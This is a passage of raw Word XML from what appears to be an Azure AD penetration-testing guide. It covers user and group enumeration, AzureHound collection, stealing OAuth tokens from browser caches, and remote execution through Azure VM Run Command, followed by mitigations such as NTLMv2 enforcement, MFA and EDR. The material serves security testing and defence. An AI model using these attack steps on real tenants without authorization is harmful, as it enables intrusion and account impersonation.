    <w:p w14:paraId="4A48EEA9" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>AzureADUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AF8AA93" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="60B4B9CB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t># List groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10488C45" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>AzureADGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A39FFA5" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Graph API</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> for enumeration if tokens or user creds are available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1128D8" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Attempt Privilege Escalation in Azure AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6358C062" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Look for </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>weakly protected service principals, app registrations, or stale credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED9483D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AzureADInternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SharpHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> (with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>AzureHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> module) can map relationships:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B547CB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># Example </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>AzureHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> data collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55900558" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>AzureHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>CollectionMethod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> All -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>OutputDirectory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> .\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1129EF91" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>over-permissioned roles</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> (e.g., Global Admin, Application Administrator) if credentials or tokens allow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8450D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Token Theft and Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DDC01D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Extract </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OAuth tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>refresh tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> from local browser cache or token stores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2001CE" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Use these tokens to impersonate users or request elevated permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF243E8" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Azure VM Run Command / Automation Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C23EFBA" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Abuse </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure VM Run Command</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> to execute further commands remotely if you have adequate access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B0813F" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> run-command invoke --command-id </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>RunPowerShellScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> --name &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>-name&gt; --resource-group &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>&gt; --scripts "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B1D15" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Automate lateral movement and persistence via Azure automation or Azure Functions if compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0977AE9C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="237E6E04">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F725370" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF7D570" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Disable Legacy NTLM Versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C41D28" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LMCompatibilityLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> registry key to enforce NTLMv2 or disable NTLMv1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F3790" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t># Set NTLMv2 only (Value 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1623535A" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>ItemProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> -Path "HKLM:\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>" -Name "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>LmCompatibilityLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>" -Value 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64415479" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> to enforce this across all domain-joined machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39528950" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Enforce MFA for Azure AD Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A965C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Require </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-Factor Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> for all privileged and user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A170829" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conditional Access policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> to enforce risk-based access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0E455" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Restrict Local Admin Rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6764901B" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Minimize users with local administrator rights on Azure VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F94622" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Just-In-Time (JIT) access</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privileged Access Workstations (PAWs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51045686" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Endpoint Detection and Response (EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E783A28" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Deploy EDR tools that detect </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>registry modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTLM downgrade attempts</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unusual authentication patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BE473" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Monitor </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>process creation logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> for suspicious PowerShell Empire modules or unknown binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157FA67" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Network Segmentation and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E0719" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Segment Azure VNETs to limit lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD3476F" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Monitor SMB and NTLM traffic for downgrade attempts and unusual authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2368691C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Audit and Harden Azure AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77950D58" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Regularly audit </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure AD roles, app registrations, and service principals</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2DCF53" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Remove stale credentials and unused permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74775B6C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure AD Privileged Identity Management (PIM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB27E3" w14:textId="77777777" w:rsidR="003D399A" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="3B35E770" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="1DFC8177" w14:textId="77777777" w:rsidR="003D399A" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary Table: Pentest Workflow and Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFF7A88" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">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4"/>
        <w:gridCol w:w="3071"/>
        <w:gridCol w:w="2722"/>
        <w:gridCol w:w="2913"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D399A" w:rsidRPr="00022C5E" w14:paraId="7F90B18F" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="360CBE79" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00022C5E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21F40698" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:pPr>
